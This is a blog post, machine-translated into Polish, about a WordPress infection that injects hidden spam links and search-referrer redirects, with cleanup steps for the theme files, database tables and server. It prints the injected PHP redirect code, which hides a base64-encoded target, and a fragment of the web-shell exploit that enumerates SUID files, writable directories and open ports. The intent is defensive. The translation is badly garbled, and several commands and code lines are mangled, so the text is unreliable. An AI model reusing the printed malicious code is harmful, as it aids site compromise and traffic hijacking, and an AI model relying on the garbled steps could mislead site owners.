Wirus blogosfera ... ale miałem to?!

W ciągu ostatniego miesiąca, Dostałem ostrzeżenia Wirus w blogu od niektórych użytkowników. Początkowo zignorował ostrzeżenia, bo zainstalowany całkiem dobry program antywirusowy (Kaspersky AV 2009), A nawet blog na długi czas, nigdy nie otrzymał zawiadomienie wirusa (dawno temu .. Widziałem coś podejrzewać, że pierwszy refresh zniknął. Wreszcie ...).
Powoli zaczął wykazywać duże różnice Ruch gościemPo którym zmniejszyła się ostatnio stale ruch i zaczęło być coraz więcej osób mówi mi, że stealthsettings.com jest virused. Wczoraj otrzymałem od kogoś screenshot zrobić, gdy program antywirusowy zablokowany scenariusz na stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. To było dość przekonujące do mnie, więc mogę umieścić wszystkie źródła przeszukane. Pierwszym pomysłem, który przyszedł mi do głowy, było zrobić uaktualnienie ostatni WordPress (2.5.1), ale nie przed stary skrypt, aby usunąć wszystkie pliki z WordPress i uczynić backup danych. Procedura ta przegrała sprawę, a prawdopodobnie nie miałyby długo, aby dać mi ból Sema, gdzie, jeśli bym powiedział w dyskusji przy kawie, znalazł Google i to byłby dobry do niego.
MyDigitalLife.info, opublikował artykuł zatytułowany: "WordPress Hack: Odzyskiwanie i Fix Google i wyszukiwarki lub bez ruchu Cookie przekierowany do-Needs.info, AnyResults.Net, Golden-Info.net i innych stron nielegalnych"To jest koniec tulei i potrzebne.
Chodzi o wykorzystać WordPress na podstawie pliku cookieI myślę, że jest bardzo złożony i wykonany książkę. Na tyle sprytny, aby SQL Injection Blog Database, utworzyć niewidoczny użytkownika prosta kontrola rutynowa Deska rozdzielcza->użytkownicy, sprawdzić katalogów serwera i plików "zapisywalny" (Z chmod 777), aby szukać i wykonać pliki z uprawnieniami grupy lub korzenia. Nie wiem, którzy wykorzystują nazwę i widzę, że jest kilka artykułów napisanych o nim, mimo że wiele blogów zakażonych, w tym Rumunii. Ok ... postaram się to wyjaśnić ogólniki na temat wirusa.

Co to jest wirus?

Najpierw włóż źródła strony na blogach, linki niewidoczne dla odwiedzających, ale widoczne i wiertła dla wyszukiwarek, zwłaszcza Google. W ten sposób Page Rank strony transferu wskazany przez atakującego. Po drugie, w brzmieniu kod przekierowania URL dla turystów pochodzących z Google, Live, Yahoo, ... lub czytnik RSS, a nie strona w ciastko, antywirusowe wykrywa jako przekierowanie Trojan-Clicker.HTML.

Objawy:

Zmniejszona ogromny ruch zwiedzającychZwłaszcza na blogach, gdzie większość turystów pochodzi z Google.

Identyfikacja: (Stąd skomplikować problem dla tych, którzy nie wiedzą, w jaki sposób, jak phpMyAdmin, php i linux)

LA. UWAGA! Najpierw zrób kopię zapasową bazy danych!

1. Sprawdź pliki źródłowe index.php, header.php, footer.php, Tematem bloga i zobaczyć czy jest kod, który używa szyfrowania base64 lub zawiera "if ($ ser ==" 1 && sizeof ($ _COOKIE) == 0?) "formularz:

<? Php
$ Seref = array ("google", "msn", "żyć", "Altavista"
"Ask", "Yahoo", "AOL", "CNN", "pogoda", "Alexa");
$ Ser = 0; foreach ($ Seref jako $ ref)
if (strpos (strtolower
($ _SERVER ['HTTP_REFERER']), $ ref) == false) {$ ser = "1;? Break}!
if ($ ser == "1 && sizeof ($ _COOKIE) == 0?) {header (" Location: ". base64_decode (" ")." http:// YW55cmVzdWx0cy5uZXQ = / "); exit;
}>

... Albo coś. Usuń ten kod!

Kliknij na zdjęcie ...

Indeks kod

Na zrzucie ekranu powyżej przypadkowo wybrano "<Php get_header ();?>". Ten kod powinien pozostać.

2. Używać phpMyAdmin i przejść do tabeli bazy danych wp_usersGdzie sprawdzić, czy nie ma nazwy użytkownika utworzone na 00:00:00 0000-00-00 (Możliwe w polu user_login napisać "WordPress". Zanotuj identyfikator (ID field), a następnie je usunąć.

Kliknij na zdjęcie ...

bot

* Zielona linia należy usunąć i zachował swoje ID. W przypadku Czy ID = 8 .

3. Przejdź do tabeli wp_usermeta, Gdzie usytuowany i wycierać linie do id (gdzie pole user_id Wartość ID jest usuwany).

4. W tabeli wp_optionIdź active_plugins i zobaczyć, co plugin jest włączony podejrzanego. Może być stosowany jak zakończeń _old.giff, _old.pngg, _old.jpeg, _new.php.giffItp. rozszerzenia i kombinacje z _old _new nieprawdziwy obraz.

SELECT * FROM WHERE option_name wp_options = 'active_plugins "

Usuń z tej wtyczki, a następnie przejść do bloga - Kokpit> -> Wtyczki i włączyć wtyczkę która wyłączyć pewne.

Kliknij na zdjęcie, aby zobaczyć wydaje plik wirusa active_plugins.

wtyczka

Idź ścieżką na FTP lub SSH, wskazanym w active_plugins i usunąć plik z serwera.

5. Również w phpMyAdmin w tabeli wp_option, Znajdź i usunąć wiersz zawierający "rss_f541b3abd05e7962fcab37737f40fad8'I'internal_links_cache ".
W internal_links_cache, oferowane zaszyfrowane linki spamowe, które pojawiają się na blogu Kod Google Adsense, Haker.

6. Zaleca się, aby zmień swoje hasło Blog i login usunąć wszystkie podejrzane userele. Aktualizacja do najnowszej wersji WordPress i ustawić blog, aby nie pozwolić na rejestrację nowych użytkowników. Nie ma straty ... może komentować i nielogiczne.

Próbowałem wyjaśnić powyżej mniej więcej, co robić w takiej sytuacji, aby oczyścić blog wirusa. Problem jest poważniejszy niż się wydaje i nigdzie w pobliżu rozwiązany, do stosowania luk w zabezpieczeniach hosting serwera WWW, co jest blog.

Pierwszym środkiem bezpieczeństwa, z dostępem SSH, Make niektóre testy na serwerze, aby zobaczyć, czy są pliki takie jak * _old * i * _new. * Z zakończeń.giff,. jpeg,. pngg,. jpgg. Te pliki muszą zostać usunięte. Jeśli zmienić nazwę pliku, na przykład. top_right_old.giff in top_right_old.phpWidzimy, że plik jest dokładnie serwer kod exploita.

Niektóre użyteczne wskazania kontroli, czyszczenia i serwer ochrony. (Via SSH)

1. cd / tmp i sprawdzić, czy są foldery, takie jak tmpVFlma lub inne asemenatoare kombinacji nazwy i go usunąć. Zobacz zrzut ekranu poniżej, dwa takie foldery do mnie:

tmpserver

rm-rf nazwa_folderu

2. Sprawdź elimiati (zmiana chmod-mail) foldery z atrybutów, jak to możliwe chmod 777

znaleźć wszystkie pliki zapisywalne prądu reż: Znajdź. -Type f-perm-2-ls
znaleźć wszystkie katalogi zapisywalne prądu reż: Znajdź. -Type d-perm-2-ls
znaleźć wszystkie pliki i katalogi zapisywalne w aktualnej reż: Znajdź. -Perm-2-ls

3. Szukasz podejrzanych plików na serwerze.

Znajdź. -Name "* _new.php *"
Znajdź. -Name "* _old.php *"
Znajdź. -Name "*. Jpgg"
Znajdź. -Name "* _giff"
Znajdź. -Name "* _pngg"

4, UWAGA! pliki, które zostały ustawione trochę SUID si SGID. Pliki te wykonuje z przywilejami użytkownika (grupy) lub korzenia, a nie użytkownika, który wykonuje plik. Pliki te mogą doprowadzić do kompromisu, root, jeśli kwestie bezpieczeństwa. Jeśli nie używasz SUID i SGID plików z bitem, wykonaj "chmod 0 " je lub odinstalować pakiet je zawierające.

Exploit zawiera gdzieś w źródle ...:

if (! $ safe_mode) {
if ($ os_type == 'nix') {
$ Os = Execute ('sysctl-n kern.ostype.');
$ Os = Execute ('sysctl-n kern.osrelease.');
$ Os = Execute ('sysctl-n kernel.ostype.');
$ Os = Execute ('sysctl-n kernel.osrelease.');
if (empty ($ user)) $ user = execute ('id');
$ Aliasy = array (
"=>"
"Znajdź plików SUID '=>' find /-type f-perm-04000-ls",
"Znajdź SGID '=>' find /-type f-perm-02000-ls",
"Znajdź wszystkie pliki zapisywalne prąd dir '=>' znaleźć. -Type f-perm-2-ls ",
"Znajdź wszystkie katalogi zapisywalne prąd dir '=>' znaleźć. -Type d-perm-2-ls ",
"Znajdź wszystkie pliki i katalogi zapisywalne w aktualnej dir '=>' znaleźć. -Perm-2-ls ",
'Pokaż otwarte porty' => 'netstat-an | grep-i słuchaj ",
);
Else {}
. $ Os_name = Execute ("ver");
$ User = Execute ('echo% username%.');
$ Aliasy = array (
"=>"
"Pokaż runing usługi '=>' net start"
Lista proces Show '=>' tasklist "
);
}

Stwierdzi, że sposób ... zasadniczo naruszenia bezpieczeństwa. Porty otworzyć katalog "zapisywalny" i grupa plików przywileje egzekucyjne / root.

Powrót z więcej ...

Niektóre blogi zainfekowane: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blog /,

www.mirabilismedia.ro / blog, Blog.einvest.ro
... Lista jest długa ... dużo.

Można sprawdzić, czy blog jest wirus, używając wyszukiwarki Google. copy & paste:

Site: buy www.blegoo.com

Dobranoc i wzrost do pracy ;) Wkrótce przyjdę do Eugene wiadomości na prevezibil.imprevizibil.com.

brb :)

TO: UWAGA! Zmiana WordPress lub uaktualnienie do WordPress 2.5.1, nie jest rozwiązaniem, aby pozbyć się tego wirusa.

Wirus blogosfera ... ale miałem to?!

O autorze

podstęp

Namiętnie o wszystkim, co oznacza gadżety i IT, piszę z przyjemnością stealthsettings.com od 2006 i lubię odkrywać z wami nowe rzeczy na temat komputerów i systemów operacyjnych macOS, Linux, Windows, iOS i Android.

Zostaw komentarz